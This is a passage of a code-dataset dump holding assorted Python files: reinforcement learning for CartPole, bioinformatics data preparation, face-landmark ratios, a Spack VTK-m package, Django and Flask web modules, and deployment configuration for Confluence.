cloumns[0]\n\n if room in book:\n book[room] += 1\n else:\n book[room] = 1\n\nprint(book)","sub_path":"exam_1st/room_count.py","file_name":"room_count.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"553202920","text":"# Use Q-Learning with RBF Neural Network to solve CartPole\nfrom __future__ import print_function, division\nfrom builtins import range\n# NOTE: may need to update the version of future\n# pip3 install -U future\n\n# Works best with multiple RBF kernels at var = 0.05, 0.1, 0.5, 1.0\n\nimport os\nimport sys\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom gym import wrappers\nfrom datetime import datetime\nfrom sklearn.pipeline import FeatureUnion\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.kernel_approximation import RBFSampler\nfrom q_learning_bins import plot_running_avg\n\n\nclass SGDRegressor:\n\tdef __init__(self, D, learning_rate=0.1):\n\t\tself.w = np.random.randn(D) / np.sqrt(D)\n\t\tself.lr = learning_rate\n\n\tdef partial_fit(self, X, Y):\n\t\t# self.w += self.lr * (Y - X.dot(self.w)) * np.squeeze(X)\n\t\tself.w += self.lr * (Y - X.dot(self.w)).dot(X)\n\n\tdef predict(self, X):\n\t\treturn X.dot(self.w)\n\n\nclass FeatureTransformer:\n\tdef __init__(self, env, n_components=1000, n_samples=20000):\n\t\t# observation_examples = np.array([env.observation_space.sample() for i in range(n_samples)])\n\t\t# NOTE: state samples are poor, because we get velocity -> infinity\n\t\tobservation_examples = np.random.random((n_samples, env.observation_space.shape[0]))*2 - 1\n\t\tscaler = StandardScaler()\n\t\tscaler.fit(observation_examples)\n\n\t\t# Used to converte a state to a featurized representation.\n\t\t# We use RBF kernels with different variances to cover different parts of the 
space\n\t\tfeaturizer = FeatureUnion([\n\t\t\t('rbf1', RBFSampler(gamma=0.05, n_components=n_components)),\n\t\t\t('rbf2', RBFSampler(gamma=1.0 , n_components=n_components)),\n\t\t\t('rbf3', RBFSampler(gamma=0.5 , n_components=n_components)),\n\t\t\t('rbf4', RBFSampler(gamma=0.1 , n_components=n_components))\n\t\t])\n\t\tfeature_examples = featurizer.fit_transform(scaler.transform(observation_examples))\n\n\t\tself.dimensions = feature_examples.shape[1]\n\t\tself.scaler = scaler\n\t\tself.featurizer = featurizer\n\n\tdef transform(self, observations):\n\t\tscaled = self.scaler.transform(observations)\n\t\treturn self.featurizer.transform(scaled)\n\n\n# Holds one SGDRegressor for each action\nclass Model:\n\tdef __init__(self, env, feature_transformer, learning_rate=0.1):\n\t\tself.env = env\n\t\tself.models = []\n\t\tself.feature_transformer = feature_transformer\n\t\tfor i in range(env.action_space.n):\n\t\t\tmodel = SGDRegressor(feature_transformer.dimensions, learning_rate)\n\t\t\tself.models.append(model)\n\n\tdef predict(self, s):\n\t\tX = self.feature_transformer.transform(np.atleast_2d(s))\n\t\treturn np.array([m.predict(X)[0] for m in self.models])\n\n\tdef update(self, s, a, G):\n\t\tX = self.feature_transformer.transform(np.atleast_2d(s))\n\t\tself.models[a].partial_fit(X, [G])\n\n\tdef sample_action(self, s, eps):\n\t\tif np.random.random() < eps:\n\t\t\treturn self.env.action_space.sample()\n\t\telse:\n\t\t\treturn np.argmax(self.predict(s))\n\n\ndef play_one(model, eps, gamma, max_iters=2000):\n\tobservation = model.env.reset()\n\tdone = False\n\ttotalreward = 0\n\titers = 0\n\twhile not done and iters < max_iters:\n\t\t# if we reach 2000, just quit, don't want this going forever\n\t\t# the 200 limit seems a bit early\n\t\taction = model.sample_action(observation, eps)\n\t\tprev_observation = observation\n\t\tobservation, reward, done, info = model.env.step(action)\n\n\t\tif done:\n\t\t\treward = -200\n\n\t\t# update the model\n\t\tnext_q = model.predict(observation)\n\t\tassert(len(next_q.shape) == 1)\n\t\tG = reward + gamma * np.max(next_q)\n\t\tmodel.update(prev_observation, action, G)\n\n\t\tif reward == 1:\n\t\t\ttotalreward += reward\n\t\titers += 1\n\n\treturn totalreward\n\n\ndef main():\n\tgym.envs.register(\n\t\tid='MyCartPole-v0',\n\t\tentry_point='gym.envs.classic_control:CartPoleEnv',\n\t\tmax_episode_steps=10000,\n\t\treward_threshold=9975.0,\n\t)\n\tenv = gym.make('MyCartPole-v0')\n\t# env = gym.make('CartPole-v0')\n\tft = FeatureTransformer(env)\n\n\tif 'monitor' in sys.argv:\n\t\tfilename = os.path.basename(__file__).split('.')[0]\n\t\tmonitor_dir = './' + filename + '_' + str(datetime.now())\n\t\tenv = wrappers.Monitor(env, monitor_dir)\n\n\tmodel = Model(env, ft)\n\tgamma = 0.99\n\n\tN = 500\n\ttotalrewards = np.empty(N)\n\tfor n in range(N):\n\t\teps = 1.0 / np.sqrt(n + 1)\n\t\ttotalreward = play_one(model, eps, gamma)\n\t\ttotalrewards[n] = totalreward\n\t\tif n % 100 == 0:\n\t\t\tprint('episode:', n, 'total reward:', totalreward, 'eps:', eps, 'avg reward (last 100):', totalrewards[max(0, n-99):(n+1)].mean())\n\n\tprint('avg reward for last 100 episodes:', totalrewards[-100:].mean())\n\tprint('total steps:', totalrewards.sum())\n\n\tplt.plot(totalrewards)\n\tplt.title('Rewards')\n\tplt.show()\n\n\tplot_running_avg(totalrewards)\n\n\nif __name__ == 
'__main__':\n\tmain()\n\n","sub_path":"rl_deep/cartpole/q_learning.py","file_name":"q_learning.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"2531077","text":"import pandas as pd\nimport numpy as np\n\ndrug_responses = pd.read_csv(\"data/DrugResponses.csv\")\ninhibitors_list = drug_responses.inhibitor.unique()\ndel drug_responses['ic50']\npivot_drug_response = pd.pivot_table(drug_responses, index='lab_id', columns='inhibitor', aggfunc=np.max, fill_value=0)\n# Remove NA values\npivot_drug_response = pivot_drug_response[np.isfinite(pivot_drug_response)]\n\n\ngene_counts = pd.read_csv(\"data/RNAseq.csv\", encoding=\"ISO-8859-1\", dtype={'lab_id': str})\ngene_counts.set_index('lab_id', inplace=True)\ngene_counts_transpose = gene_counts.transpose()\ngene_names = gene_counts.index\ngene_count_ids = gene_counts_transpose.index\n\n\ntop_gene_counts = gene_counts.loc[gene_names] # This includes all genes\ntop_gene_counts_t = top_gene_counts.transpose()\n\ndrugs_list = [22, 28, 43, 46, 82, 91, 109, 120]\nfor drug_num in drugs_list:\n sort_by_drug = pivot_drug_response.reindex(\n pivot_drug_response['auc'].sort_values(by=inhibitors_list[drug_num], ascending=False).index)\n sort_by_drug = sort_by_drug[sort_by_drug > 0]\n drug_response = sort_by_drug['auc'][inhibitors_list[drug_num]]\n drug_response = drug_response.dropna()\n drug_response_ids = drug_response.index\n combined_ids = list(set(gene_count_ids) & set(drug_response_ids))\n drug_sample_genetics = top_gene_counts_t.loc[combined_ids]\n X = drug_sample_genetics.sort_index()\n X.to_csv('./data_outputs/X_data/X_' + inhibitors_list[drug_num] + '.csv')\n\n","sub_path":"other_code/ExpressionData.py","file_name":"ExpressionData.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"282666101","text":"# coding: utf-8\nimport cv2\nfrom glance.jf_ult.geom_tool import GeomTool\n\n\nclass ESR:\n def __init__(self, landmarks: dict, img=None):\n # self.landmarks = landmarks\n self.image = img\n self.landmarks = landmarks\n\n # calculate\n self.left_eye_head = landmarks['43']\n self.left_eye_tail = landmarks['46']\n\n self.right_eye_head = landmarks['40']\n self.right_eye_tail = landmarks['37']\n\n self.left_eye_long = GeomTool.get_pt_dist(self.left_eye_tail, self.left_eye_head)\n self.right_eye_long = GeomTool.get_pt_dist(self.right_eye_tail, self.right_eye_head)\n\n self.eye_bar = GeomTool.get_pt_dist(self.left_eye_tail, self.right_eye_tail)\n self.eye_dist = GeomTool.get_pt_dist(self.left_eye_head, self.right_eye_head)\n\n self.val = (self.eye_bar - self.eye_dist) / self.eye_dist\n self.val_2 = (self.left_eye_long + self.right_eye_long) / self.eye_dist\n self.val_3 = (self.left_eye_long + self.right_eye_long) / (self.eye_dist * 2)\n self.val_4 = self.eye_bar / self.eye_dist\n\n # display\n self.red = (0, 0, 255)\n self.green = (0, 255, 0)\n self.thick = 2\n\n def get_face_coords(self):\n coords = []\n for i in range(17):\n lm_id = str(i + 1)\n coords.append(self.landmarks[lm_id])\n\n return coords\n\n def show(self, dest_path=None):\n temp = self.image.copy()\n cv2.line(temp, self.left_eye_tail, self.right_eye_tail, self.red, self.thick)\n cv2.line(temp, self.left_eye_head, self.right_eye_head, self.green, self.thick)\n\n if dest_path:\n cv2.imwrite(dest_path, temp)\n else:\n cv2.imshow('{}'.format(__name__), temp)\n 
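A minimal, self-contained sketch of the RBF featurization pattern used by the CartPole Q-learning sample above: sample stand-in states, standardize them, then stack several RBFSampler kernels with FeatureUnion. The state dimension and component counts here are illustrative, not values from the script.

```python
import numpy as np
from sklearn.pipeline import FeatureUnion
from sklearn.preprocessing import StandardScaler
from sklearn.kernel_approximation import RBFSampler

# Stand-in for environment observations; the script above samples
# uniformly in [-1, 1) because raw CartPole velocities are unbounded.
states = np.random.random((1000, 4)) * 2 - 1
scaler = StandardScaler().fit(states)
featurizer = FeatureUnion([
    ('rbf%d' % i, RBFSampler(gamma=g, n_components=100))
    for i, g in enumerate([0.05, 0.1, 0.5, 1.0])
])
features = featurizer.fit_transform(scaler.transform(states))
print(features.shape)  # (1000, 400): 100 features per kernel, concatenated
```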
cv2.waitKey(0)\n","sub_path":"Face-Feat-Tool-Glance/glance/face_feat/ratio/esr.py","file_name":"esr.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"303111725","text":"import sys\nsys.path.append(\"../\")\nimport getopt, os, swarced, pickle, run_ketu, time\nimport numpy as np\nimport multiprocessing as mp\n\n'''You can execute many ketu runs from the commandline using this program.\nRuns should be formatted lsike:\npython multirun.py path_to_query_directory\nThe query directory should contain all the query pickled dictionaries you wish\nto run. There can only be one per EPIC_ID. The output files will be paced in the\nsame location. \nUsing this naming convention, you can only have one query for a particular\nepicID in each location or else it will be overwritten!\n'''\n\ndef main(argv):\n start = time.time()\n query_dir,skipfile,campaign = argv[0], argv[1],argv[2]\n campaign = int(campaign)\n try:\n f = open(skipfile,\"a\")\n f.close()\n except:\n print(\"test\")\n f = open(skipfile,'wb')\n f.close()\n pickle.dump([], open(query_dir + \"timing.pkl\", \"wb\"))\n #Get all the content from the query_directory\n content_list = os.listdir(query_dir)\n #Separate out the .result and .query files\n result_list = [fn for fn in content_list if (\".result\" in fn)]\n query_list = np.array([fn for fn in content_list if (\".query\" in fn)])\n #make a mask for which .query files don't have a .result file\n not_run = np.array([(query.split(\".\")[0] + \".result\" not in result_list) for query in query_list])\n query_list = query_list[not_run]\n #Format the arguments of epicID, campaign, and absolute path to each query file for the remaining queries\n args = [[fn[4:13], campaign, query_dir + fn, skipfile] for fn in query_list]\n #Farm them to multiprocessing\n pool = mp.Pool(processes=mp.cpu_count())\n results = pool.map(run_ketu.main, args)\n pool.close()\n pool.join()\n pickle.dump([time.time() - start, results], open(query_dir + \"timing.pkl\", \"wb\"))\n \nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"multirun_ketu.py","file_name":"multirun_ketu.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"653439942","text":"from django.urls import path\nfrom . import views\n\napp_name = 'chatapp'\nurlpatterns = [\n path('', views.HomeView.as_view(), name='home'),\n path('chat///messages', views.chatpage, name='chatpage'),\n path('chat///delete-message//', views.delete_chat_message,\n name=\"delete_chat_message\"),\n path('chat/chat-redirecter///', views.user_chat_redirecter,\n name='user_chat_redirecter'),\n]\n","sub_path":"chatapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650245714","text":"# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\n\nfrom spack import *\nimport os\n\n\nclass Vtkm(CMakePackage, CudaPackage):\n \"\"\"VTK-m is a toolkit of scientific visualization algorithms for emerging\n processor architectures. 
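The multirun_ketu.py script above fans its pending .query files out over a process pool; below is a minimal sketch of that pattern with a trivial stand-in for run_ketu.main. The EPIC ids and paths are made up for illustration.

```python
import multiprocessing as mp

def worker(args):
    # Stand-in for run_ketu.main: unpack [epicID, campaign, query_path, skipfile]
    epic_id, campaign, query_path, skipfile = args
    return epic_id

if __name__ == '__main__':
    jobs = [['201367065', 1, '/tmp/epic201367065.query', '/tmp/skip.txt'],
            ['201367066', 1, '/tmp/epic201367066.query', '/tmp/skip.txt']]
    with mp.Pool(processes=mp.cpu_count()) as pool:
        results = pool.map(worker, jobs)
    print(results)  # ['201367065', '201367066']
```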
VTK-m supports the fine-grained concurrency for\n data analysis and visualization algorithms required to drive extreme scale\n computing by providing abstract models for data and execution that can be\n applied to a variety of algorithms across many different processor\n architectures.\"\"\"\n\n homepage = \"https://m.vtk.org/\"\n url = \"https://gitlab.kitware.com/api/v4/projects/vtk%2Fvtk-m/repository/archive.tar.gz?sha=v1.3.0\"\n git = \"https://gitlab.kitware.com/vtk/vtk-m.git\"\n\n # version used for ascent\n version('ascent_ver', commit='23b73103e0ea242f1d9b3e7116410d1c6c832d38', preferred=True)\n version('master', branch='master')\n version('1.3.0', \"d9f6e274dec2ea01273cccaba356d23ca88c5a25\")\n version('1.2.0', \"3295fed86012226c107e1f2605ca7cc583586b63\")\n version('1.1.0', \"6aab1c0885f6ffaaffcf07930873d0df\")\n\n # use release, instead of release with debug symbols b/c vtkm libs\n # can overwhelm compilers with too many symbols\n variant('build_type', default='Release', description='CMake build type',\n values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))\n variant(\"shared\", default=True, description=\"build shared libs\")\n variant(\"cuda\", default=False, description=\"build cuda support\")\n variant(\"doubleprecision\", default=True,\n description='enable double precision')\n variant(\"logging\", default=False, description=\"build logging support\")\n variant(\"mpi\", default=False, description=\"build mpi support\")\n variant(\"openmp\", default=False, description=\"build openmp support\")\n variant(\"rendering\", default=True, description=\"build rendering support\")\n variant(\"tbb\", default=True, description=\"build TBB support\")\n variant(\"64bitids\", default=False,\n description=\"enable 64 bits ids\")\n\n depends_on(\"cmake\")\n\n depends_on(\"tbb\", when=\"+tbb\")\n depends_on(\"cuda\", when=\"+cuda\")\n depends_on(\"mpi\", when=\"+mpi\")\n\n # secretly change build to static when building with cuda to bypass spack variant\n # forwarding crazyness\n #conflicts('+cuda', when='+shared', msg='vtk-m must be built statically (~shared) when cuda is enabled')\n\n def cmake_args(self):\n spec = self.spec\n options = []\n with working_dir('spack-build', create=True):\n options = [\"../\",\n \"-DVTKm_ENABLE_TESTING:BOOL=OFF\"]\n # shared vs static libs logic\n # force building statically with cuda\n if \"+cuda\" in spec:\n options.append('-DBUILD_SHARED_LIBS=OFF')\n else:\n if \"+shared\" in spec:\n options.append('-DBUILD_SHARED_LIBS=ON')\n else:\n options.append('-DBUILD_SHARED_LIBS=OFF')\n # cuda support\n if \"+cuda\" in spec:\n options.append(\"-DVTKm_ENABLE_CUDA:BOOL=ON\")\n options.append(\"-DCMAKE_CUDA_HOST_COMPILER={0}\".format(env[\"SPACK_CXX\"]))\n if 'cuda_arch' in spec.variants:\n cuda_arch = spec.variants['cuda_arch'].value[0]\n vtkm_cuda_arch = \"native\"\n arch_map = {\"75\":\"turing\", \"70\":\"volta\",\n \"62\":\"pascal\", \"61\":\"pascal\", \"60\":\"pascal\",\n \"53\":\"maxwell\", \"52\":\"maxwell\", \"50\":\"maxwell\",\n \"35\":\"kepler\", \"32\":\"kepler\", \"30\":\"kepler\"}\n if cuda_arch in arch_map:\n vtkm_cuda_arch = arch_map[cuda_arch]\n options.append(\n '-DVTKm_CUDA_Architecture={0}'.format(vtkm_cuda_arch))\n else:\n options.append(\"-DVTKm_ENABLE_CUDA:BOOL=OFF\")\n\n # double precision\n if \"+doubleprecision\" in spec:\n options.append(\"-DVTKm_USE_DOUBLE_PRECISION:BOOL=ON\")\n else:\n options.append(\"-DVTKm_USE_DOUBLE_PRECISION:BOOL=OFF\")\n\n # logging support\n if \"+logging\" in spec:\n if spec.satisfies('@:1.2.0') and \\\n 
spec['vtkm'].version.string != 'master' and \\\n spec['vtkm'].version.string != 'ascent_ver' :\n raise InstallError('logging is not supported for\\\n vtkm version lower than 1.3')\n options.append(\"-DVTKm_ENABLE_LOGGING:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_LOGGING:BOOL=OFF\")\n\n # mpi support\n if \"+mpi\" in spec:\n if spec.satisfies('@:1.2.0') and \\\n spec['vtkm'].version.string != 'master' and \\\n spec['vtkm'].version.string != 'ascent_ver':\n raise InstallError('mpi is not supported for\\\n vtkm version lower than 1.3')\n options.append(\"-DVTKm_ENABLE_MPI:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_MPI:BOOL=OFF\")\n\n # openmp support\n if \"+openmp\" in spec:\n # openmp is added since version 1.3.0\n if spec.satisfies('@:1.2.0') and \\\n spec['vtkm'].version.string != 'master' and \\\n spec['vtkm'].version.string != 'ascent_ver':\n raise InstallError('OpenMP is not supported for\\\n vtkm version lower than 1.3')\n options.append(\"-DVTKm_ENABLE_OPENMP:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_OPENMP:BOOL=OFF\")\n\n # rendering support\n if \"+rendering\" in spec:\n options.append(\"-DVTKm_ENABLE_RENDERING:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_RENDERING:BOOL=OFF\")\n\n # tbb support\n if \"+tbb\" in spec:\n # vtk-m detectes tbb via TBB_ROOT env var\n os.environ[\"TBB_ROOT\"] = spec[\"tbb\"].prefix\n options.append(\"-DVTKm_ENABLE_TBB:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_TBB:BOOL=OFF\")\n\n # 64 bit ids\n if \"+64bitids\" in spec:\n options.append(\"-DVTKm_USE_64BIT_IDS:BOOL=ON\")\n print(\"64 bit ids enabled\")\n else:\n options.append(\"-DVTKm_USE_64BIT_IDS:BOOL=OFF\")\n return options\n","sub_path":"scripts/uberenv/packages/vtkm/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"628947448","text":"from bs4 import BeautifulSoup\r\nfrom functools import wraps\r\n\r\n\r\n\r\nclass BeautifulSoupMakeTag:\r\n\t\"\"\" Pomocná třída pro BeautifulSoup k vytváření tagů.\r\n\t\tPoužívá interní html parser Pythonu.\r\n\r\n\t\tclass_ --> element[\"class\"]\r\n\t\tstring_ --> element.string\r\n\t\tparent_ --> parent_.append(element)\r\n\t\thttpequiv_ --> kwargs[\"http-equiv\"]\r\n\r\n\t\tVše ostatní bude rovnou automaticky přidáno do kwargs.\r\n\t\"\"\"\r\n\r\n\tdef __init__(self):\r\n\t\tself.BeautifulSoup_new_tag = BeautifulSoup(\"\", \"html.parser\").new_tag\r\n\r\n\tdef new_tag(self, *args, **kwargs):\r\n\t\tclass_ = kwargs.pop(\"class_\", None)\r\n\t\tstring_ = kwargs.pop(\"string_\", None)\r\n\t\tparent_ = kwargs.pop(\"parent_\", None)\r\n\t\t\r\n\t\thttpequiv_ = kwargs.pop(\"httpequiv_\", None)\r\n\t\tif httpequiv_:\r\n\t\t\tkwargs[\"http-equiv\"] = httpequiv_\r\n\r\n\t\telement = self.BeautifulSoup_new_tag(*args,\r\n\t\t\t\t\t**{k:v for k,v in kwargs.items() if v})\r\n\r\n\t\tif class_:\r\n\t\t\telement[\"class\"] = class_\r\n\t\tif string_:\r\n\t\t\telement.string = str(string_)\r\n\t\tif parent_:\r\n\t\t\tparent_.append(element)\r\n\r\n\t\treturn element\r\n\r\n\r\ndef debug_decorator(vebrose=True):\r\n\t\"\"\" Postupně zavolá funkce (step_a, step_b a step_c)\r\n\t\tz obalené třídy. 
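The vtkm Spack package above translates Spack's numeric cuda_arch values into the architecture names VTK-m's CMake option expects; the lookup reduces to a dict.get with the package's "native" fallback, as this small sketch (table copied from the package) shows.

```python
# arch_map copied from the vtkm package above; "native" is the fallback
# used when the numeric arch is not in the table.
arch_map = {"75": "turing", "70": "volta",
            "62": "pascal", "61": "pascal", "60": "pascal",
            "53": "maxwell", "52": "maxwell", "50": "maxwell",
            "35": "kepler", "32": "kepler", "30": "kepler"}

def vtkm_cuda_architecture(cuda_arch):
    return arch_map.get(cuda_arch, "native")

print(vtkm_cuda_architecture("70"))  # volta
print(vtkm_cuda_architecture("80"))  # native
```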
Jednotlivé kroky popíše v HTML\r\n\t\tpodoby do \"debug_container\".\r\n\r\n\t\tvebrose=True --> důkladný popis výsledku (default)\r\n\t\tvebrose=False --> pouze Ok jako popis správného výsledku\r\n\t\"\"\"\r\n\t\r\n\tdef func_decorator(func):\r\n\t\t@wraps(func)\r\n\t\tdef func_wrapper(arg, arg_decorator):\r\n\t\t\tdebug_func = func(arg)\r\n\t\t\tbs_new = BeautifulSoupMakeTag().new_tag\r\n\r\n\t\t\tbs_new(\"div\",\r\n\t\t\t\tclass_=\"block\",\r\n\t\t\t\tstring_=\"%s:%s\" % (func.__name__, func.__doc__),\r\n\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\ttry:\r\n\t\t\t\tbs_new(\"span\", string_=\"krok_a\", parent_=arg_decorator)\r\n\t\t\t\tdebug_a = debug_func.step_a()\r\n\t\t\t\tif not debug_a:\r\n\t\t\t\t\traise Exception(\"hodnota je None\")\r\n\t\t\t\tbs_new(\"span\",\r\n\t\t\t\t\tclass_=\"ok\",\r\n\t\t\t\t\tstring_=\"Ok\",\r\n\t\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\t\tbs_new(\"span\", string_=\"krok_b\", parent_=arg_decorator)\r\n\t\t\t\tdebug_b = debug_func.step_b(debug_a)\r\n\t\t\t\tif not debug_b:\r\n\t\t\t\t\traise Exception(\"hodnota je None\")\r\n\t\t\t\tbs_new(\"span\",\r\n\t\t\t\t\tclass_=\"ok\",\r\n\t\t\t\t\tstring_=\"Ok\",\r\n\t\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\t\tif str(type(debug_b)) == \"\":\r\n\t\t\t\t\tdebug_b[\"class\"] = \"marked\"\r\n\r\n\t\t\t\tbs_new(\"span\", string_=\"krok_c\", parent_=arg_decorator)\r\n\t\t\t\tdebug_c = debug_func.step_c(debug_b)\r\n\t\t\t\tif not debug_c:\r\n\t\t\t\t\traise Exception(\"hodnota je None\")\r\n\t\t\t\tbs_new(\"span\",\r\n\t\t\t\t\tclass_=\"ok\",\r\n\t\t\t\t\tstring_=debug_c if vebrose else \"Ok\",\r\n\t\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\texcept Exception as error:\r\n\t\t\t\tbs_new(\"span\",\r\n\t\t\t\t\tclass_=\"fail\",\r\n\t\t\t\t\tstring_=error,\r\n\t\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\t\tdebug_c = None\r\n\r\n\t\t\treturn debug_c\r\n\r\n\t\treturn func_wrapper\r\n\r\n\treturn func_decorator\r\n","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"574137570","text":"pkg_yum = {}\n\nsvc_systemd = {\n 'confluence': {\n 'enabled': True,\n 'needs': [\n 'file:/usr/lib/systemd/system/confluence.service',\n ],\n },\n}\n\nusers = {}\n\ngroups = {}\n\nfiles = {\n '/usr/lib/systemd/system/confluence.service': {\n 'source': \"usr/lib/systemd/system/confluence.service\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0644\",\n 'content_type': \"mako\",\n },\n}\n\ndirectories = {}\n\nfor confluence in node.metadata['confluence']:\n\n users[\"{}\".format(confluence['run_user'])] = {\n \"full_name\": \"Confluence Service Account\",\n \"gid\": 1101,\n \"home\": (confluence['data_dir']),\n \"uid\": 1101,\n }\n\n groups[\"confluence\".format(confluence['run_user'])] = {\n \"gid\": 1101,\n }\n\n files[\"{}/bin/setenv.sh\".format(confluence['install_dir'])] = {\n 'source': \"confluence/bin/setenv.sh\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0664\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:confluence:restart\",\n ],\n }\n\n files[\"{}/bin/user.sh\".format(confluence['install_dir'])] = {\n 'source': \"confluence/bin/user.sh\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0664\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:confluence:restart\",\n ],\n }\n\n files[\"{}/conf/server.xml\".format(confluence['install_dir'])] = {\n 
'source': \"confluence/conf/server.xml\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0664\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:confluence:restart\",\n ],\n }\n\n files[\"{}/confluence/WEB-INF/classes/confluence-init.properties\".format(confluence['install_dir'])] = {\n 'source': \"confluence/confluence/WEB-INF/classes/confluence-init.properties\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0664\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:confluence:restart\",\n ],\n }\n\n directories[\"{}/logs\".format(confluence['install_dir'])] = {\n 'mode': \"0775\",\n 'owner': \"confluence\",\n 'group': \"root\",\n }\n\n directories[\"{}/temp\".format(confluence['install_dir'])] = {\n 'mode': \"0755\",\n 'owner': \"confluence\",\n 'group': \"root\",\n }\n\n directories[\"{}/work\".format(confluence['install_dir'])] = {\n 'mode': \"0775\",\n 'owner': \"confluence\",\n 'group': \"root\",\n }\n\nif node.has_bundle(\"monit\"):\n files['/etc/monit.d/confluence'] = {\n 'source': \"etc/monit.d/confluence\",\n 'mode': \"0640\",\n 'owner': \"root\",\n 'group': \"root\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:monit:restart\",\n ],\n }\n\nif node.has_bundle(\"collectd-java\"):\n\n files['/etc/collectd.d/conf.d/confluence.conf'] = {\n 'source': \"etc/collectd.d/conf.d/confluence.conf\",\n 'mode': \"0640\",\n 'owner': \"root\",\n 'group': \"root\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:collectd:restart\",\n ],\n }\n\n files['/etc/collectd.d/types/confluence.db'] = {\n 'source': \"etc/collectd.d/types/confluence.db\",\n 'mode': \"0640\",\n 'owner': \"root\",\n 'group': \"root\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:collectd:restart\",\n ],\n }\n","sub_path":"bundles/confluence/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"182634102","text":"from flask import (render_template, Blueprint, url_for, redirect,\n \t\t\t\t\tflash, current_app, request, abort, Markup)\nfrom compleaks import db, mail\nfrom flask_login import current_user, login_required\nfrom flask_mail import Message\nfrom compleaks.usuarios.models import Usuario\nfrom compleaks.newsletters.models import Divulgacao, Material\nfrom compleaks.newsletters.forms import LetterForm, MaterialForm\nimport os\nfrom datetime import datetime\n\nnewsletters = Blueprint('newsletters', __name__,template_folder='templates/newsletters')\n\n@newsletters.route('/adicionar', methods=['POST', 'GET'])\n@login_required\ndef adicionar():\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform = LetterForm()\n\n\tif form.validate_on_submit():\n\n\t\ttarget = os.path.join(current_app.root_path, 'newsletters/templates/newsletters/uploads')\n\t\tfile = form.html.data\n\t\tfilename = file.filename\n\t\tdestination = \"/\".join([target, filename])\n\n\t\tif os.path.exists(destination):\n\t\t\tflash(\"Não foi possivel salvar o arquivo!\", \"danger\")\n\t\t\tflash(\"O nome do arquivo que vc submeteu já existe, favor mudar o nome e tentar novamente!\", \"info\")\n\t\t\treturn render_template('novo_letter.html', form=form)\n\n\n\t\tfile.save(destination)\n\n\n\t\t'''zip_archive = ZipFile(filename, 
\"w\")\n\t\tzip_archive.write(destination, destination[len(target) + 1:])'''\n\n\t\tnova = Divulgacao(title=form.titulo.data, body=form.front_end.data, html=filename)\n\t\tdb.session.add(nova)\n\t\tdb.session.commit()\n\t\tflash("Newsletters adicionado com sucesso\", \"success\")\n\n\treturn render_template('novo_letter.html', form=form)\n\n\n@newsletters.route('/deletar/<int:id>', methods=['POST', 'GET'])\n@login_required\ndef deletar(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform = LetterForm()\n\n\tdelete = Divulgacao.query.get_or_404(id)\n\n\ttarget = os.path.join(current_app.root_path, 'newsletters/templates/newsletters/uploads')\n\tdestination = \"/\".join([target, delete.html])\n\tos.remove(destination)\n\n\tdb.session.delete(delete)\n\tdb.session.commit()\n\n\tflash(\"Newsletters deletado com sucesso\", \"info\")\n\n\treturn redirect(url_for(\"newsletters.listar\"))\n\n\n@newsletters.route('/editar/<int:id>', methods=['POST', 'GET'])\n@login_required\ndef editar(id):\n\n\tif not 